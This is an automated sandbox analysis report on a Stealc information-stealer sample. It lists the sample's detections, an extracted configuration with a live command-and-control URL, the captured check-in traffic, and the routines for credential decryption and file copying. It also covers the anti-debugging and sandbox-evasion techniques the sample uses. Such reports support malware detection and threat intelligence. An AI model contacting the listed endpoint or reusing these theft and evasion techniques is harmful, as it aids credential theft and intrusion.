Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1525249
MD5:622f9f481586d5dca1356051e20c13fa
SHA1:4e56e103cdb596ddad6076de8132d9839abd0b3d
SHA256:75e9d83e734f70de74b22032c01c7adee9bc2b0244ab7506bc59c5adc27d81a6
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6668 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 622F9F481586D5DCA1356051E20C13FA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1777021191.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1736083910.0000000004AE0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6668JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6668JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.560000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-03T23:41:06.892569+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.560000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0056C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00567240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00567240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00569AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00569AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00569B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00569B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00578EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00578EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_005738B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00574910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00574910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0056DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0056E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00574570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00574570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0056ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0056BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0056DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005616D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0056F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00573EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00573EA0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIDAAAKJJDBGCBFCBGIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 38 30 42 35 30 34 37 33 32 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 2d 2d 0d 0a Data Ascii: ------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="hwid"F80B504732BC4158135236------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="build"doma------CGIDAAAKJJDBGCBFCBGI--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00564880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00564880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIDAAAKJJDBGCBFCBGIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 38 30 42 35 30 34 37 33 32 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 2d 2d 0d 0a Data Ascii: ------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="hwid"F80B504732BC4158135236------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="build"doma------CGIDAAAKJJDBGCBFCBGI--
                Source: file.exe, 00000000.00000002.1777021191.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1777021191.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1777021191.0000000000E87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1777021191.0000000000E87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/X
                Source: file.exe, 00000000.00000002.1777021191.0000000000E87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1777021191.0000000000E87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php-
                Source: file.exe, 00000000.00000002.1777021191.0000000000E87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php/
                Source: file.exe, 00000000.00000002.1777021191.0000000000EA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpU
                Source: file.exe, 00000000.00000002.1777021191.0000000000E87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008030850_2_00803085
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009408840_2_00940884
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009BA8A30_2_009BA8A3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009370440_2_00937044
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00933A840_2_00933A84
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00813A0E0_2_00813A0E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008FDA6E0_2_008FDA6E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0089F3B20_2_0089F3B2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00938B460_2_00938B46
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00939CB60_2_00939CB6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0093F4E10_2_0093F4E1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00934D1E0_2_00934D1E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B46880_2_008B4688
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008DF79E0_2_008DF79E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00832FB70_2_00832FB7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00903F2E0_2_00903F2E
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 005645C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: zlxgcsga ZLIB complexity 0.9952391112695078
                Source: file.exe, 00000000.00000003.1736083910.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00579600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00579600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00573720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00573720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\L3YU8IX6.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1862144 > 1048576
                Source: file.exeStatic PE information: Raw size of zlxgcsga is bigger than: 0x100000 < 0x1a0800

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.560000.0.unpack :EW;.rsrc :W;.idata :W; :EW;zlxgcsga:EW;bzmpgjce:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;zlxgcsga:EW;bzmpgjce:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00579860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00579860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1d2cf6 should be: 0x1d463c
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: zlxgcsga
                Source: file.exeStatic PE information: section name: bzmpgjce
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00803085 push 37B28704h; mov dword ptr [esp], edi0_2_008031C2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00803085 push 163E3B61h; mov dword ptr [esp], ecx0_2_008031CD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push ecx; mov dword ptr [esp], ebp0_2_00940889
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push ecx; mov dword ptr [esp], esp0_2_0094088D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push 4316F48Ah; mov dword ptr [esp], esi0_2_0094089D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push edi; mov dword ptr [esp], eax0_2_00940956
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push eax; mov dword ptr [esp], ecx0_2_0094096F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push 346F58D7h; mov dword ptr [esp], ecx0_2_00940A9C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push 49094878h; mov dword ptr [esp], eax0_2_00940AA6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push eax; mov dword ptr [esp], edx0_2_00940B8E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push 546E04EEh; mov dword ptr [esp], edi0_2_00940C90
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push 422C7805h; mov dword ptr [esp], edi0_2_00940CB7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push 64A67E3Bh; mov dword ptr [esp], ecx0_2_00940CC1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push 535CD4C1h; mov dword ptr [esp], edx0_2_00940D50
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push esi; mov dword ptr [esp], eax0_2_00940D9D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push 5EB055CCh; mov dword ptr [esp], esp0_2_00940E1B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push ecx; mov dword ptr [esp], 1CF66EBEh0_2_00940E33
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push 4B23C2BCh; mov dword ptr [esp], eax0_2_00940E4D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push edx; mov dword ptr [esp], esi0_2_00940E68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push ebx; mov dword ptr [esp], eax0_2_00940E97
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push 7D70C5A7h; mov dword ptr [esp], eax0_2_00940F28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push ebx; mov dword ptr [esp], edx0_2_00940FC9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push ebp; mov dword ptr [esp], ecx0_2_00941006
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push 4A2E3A96h; mov dword ptr [esp], eax0_2_0094104C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push 1E424023h; mov dword ptr [esp], ecx0_2_00941059
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push ebp; mov dword ptr [esp], edi0_2_00941187
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push 1B3CC300h; mov dword ptr [esp], edx0_2_00941191
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push ebp; mov dword ptr [esp], edx0_2_009411A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push 537378B7h; mov dword ptr [esp], ebp0_2_009411DC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push eax; mov dword ptr [esp], ebx0_2_00941223
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00940884 push 49CFD8C1h; mov dword ptr [esp], edx0_2_00941279
                Source: file.exeStatic PE information: section name: zlxgcsga entropy: 7.954773553476413

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00579860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00579860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13613
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C190F second address: 7C1913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1913 second address: 7C1919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93CE9A second address: 93CEBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F7CC8D8AE31h 0x0000000a push edx 0x0000000b pop edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93CEBD second address: 93CEC2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944F6D second address: 944F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944F71 second address: 944F75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 948A6F second address: 948A93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F7CC8D8AE2Ch 0x00000016 jbe 00007F7CC8D8AE26h 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 948A93 second address: 948AB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7CC902C40Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 jl 00007F7CC902C406h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 948BB9 second address: 948BC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
